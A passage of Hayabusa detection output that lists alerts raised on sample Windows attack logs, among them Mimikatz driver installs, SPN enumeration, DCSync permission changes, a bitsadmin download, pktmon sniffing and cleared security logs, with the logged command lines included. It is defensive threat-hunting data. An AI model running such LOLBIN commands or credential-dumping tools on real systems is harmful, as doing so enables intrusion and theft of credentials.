Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | 
Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | 
Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: 
C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 20:13:11.195 
+09:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx +2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx +2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 21:06:53.407 
+09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx +2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-03-03 
19:24:12.402 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas 
| Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 
01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto 
start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
